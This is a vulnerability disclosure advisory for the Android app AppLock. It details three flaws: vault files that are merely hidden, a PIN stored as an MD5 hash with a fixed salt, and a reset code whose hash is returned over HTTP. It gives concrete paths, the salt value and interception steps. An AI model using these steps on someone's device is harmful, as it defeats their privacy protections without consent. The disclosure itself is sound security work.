SSD Advisory – AppLock Multiple Vulnerabilities

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
AppLock is Most downloaded app lock in Play Store:

  • #1 App lock in over 50 countries.
  • Over 100 Million users, supporting 24 languages.
  • AppLock can lock SMS, Contacts, Gmail, Facebook, Gallery, Market, Settings, Calls and any app you choose, with abundant options, protecting your privacy.
  • AppLock can hide pictures and videos, AppLock empowers you to control photo and video access. Selected pictures vanish from your photo gallery, and stay locked behind an easy-to-use PIN pad. With AppLock, only you can see your hidden pictures. Privacy made easy!


Vulnerability Details
The following report describes three ( 3 ) different vulnerabilities found in the AppLock, an Android application, with over 10 Millions of downloads, used to secure pictures, videos and application with a PIN code.
The first vulnerability will show how the pictures and videos are not encrypted but just hidden from the users, and even without root permission we can recover them, even with their original filename.
The second vulnerability shows how an user, with root permission on the device, can easily remove the PIN code from applications or add it to others. He can moreover change the PIN code.
The last, and most critical, vulnerability is a PIN bypass. It is possible, without root permissions and with all applications, settings, etc blocked from the app, reset the PIN code to one of our choice, and the take full control of the application.

Weak File “Encryption” Mechanism
This vulnerability allows an attacker to recover the files, photos and videos, set in the “Vault” by the target.
The user is tricked to think that the Vault perform some sort of encryption using his PIN code, instead all the files are just hidden in the filesystem.
It is important to notice that all files are saved in the r/w partition of the filesystem and not in the one assigned to the application. This allows anyone to read those files.
To retrieve the files the attacker just need to install a file manager and go to:
/<sdcard directory>/.dom0o7b1i1le/dont_remove/
and open the SQLite file ( usually it is named using a 16 bytes hash ). Inside we will find the PATH of the images and videos we want, looking at medias table and dest_path column.
We just need to remove the .MySecurityData with .dom0o7b1i1le in the filename to find the correct directory.
Once in the directory the file will have a timestamp as name. We can recover the correct name from the SQLite database we opened before.

Technical Details
Steps
The following screenshots shows the steps to retrieve the file:
applock_image_1
We can easily locate the SQLite database file in the hidden directory.
applock_image_2
In the file we can find the PATH of the image we want to retrieve. Remember we may need to replace “.MySecurityData” with “.dom0o7b1i1le”
applock_image_3
Inside the directory we can find our file named as a timestamp. We can simply copy or rename it as it was to restore access.
Weak Lock Mechanism (root required)
This vulnerability allows an attacker with local access to the target device, which has root permission enabled, to perform some operations:

  • Change the Application locked by the app: opening the SQLite database: /data/data/com.domobile.applock/databases/domobile_elock.db we can remove rows from tables lock and column pname
  • Change the target PIN code: The PIN code hash is saved in: /data/data/com.domobile.applock/shared_prefs/com.domobile.applock_preferences.xml and it is a simple MD5 with a fixed salt used in ALL installation of the app. The salt is: domobile. Since most of people use a simple PIN code ( 4-8 digits ) it is also trivial to retrieve it doing a brute force attack.

Technical Details
Steps
applock_image_4
The hashed password can be found in the preferences file.
applock_image_5
It is possible to see that using 1234 as PIN code, and domobile as SALT the hash matches.
applock_image_6
It is possible to see the list of application locked, and remove or add new rows.

Weak PIN reset Mechanism
This vulnerability allows the attacker to reset the PIN code and gain full access to all functionalities of the application without any kind of special permission. To exploit this we just need to start the reset password function, now we have two possibilities:

  • The target has not set a email address: if this is the case we can simply add our own address during the reset procedure to retrive the code to reset the PIN code.
  • The target has set an email address: if the target has already put his address we can do the following:
    • Using wireshark intercept the traffic from the smartphone to internet
    • From the application send out the reset request
    • Intercept the server response ( which is in HTTP )

In the server response will be found an MD5 hash of the reset code sent to the email, so we do not need access to target email to retrive the code. The code is a simple 8 alpha decimal string, so the md5 hash can be cracked in max 1 hour using a low-mid end GPU card.
Technical Details
Steps
For clarity I’ll use a HTTP proxy to intercept requests and response but the same can be done with Wireshark in monitor mode.
applock_image_7
Insert password view
applock_image_8
We can or set an email, or send the code to our email.
applock_image_9
When the code is requested, its MD5 hash is sent back to the application, in HTTP.
Vendor Response
The vendor was very responsive at the beginning with a response within less than 24 hours that they take all vulnerabilities seriously, however, since the 31st July no other response have been response, though numerous attempts to establish communication with them have been attempted. We have therefore decided to notify the public of this insecure product as soon as possible, it is being used by a lot of people to protect their phones and therefore they are getting a false sense of security.

Comments
Comments are closed.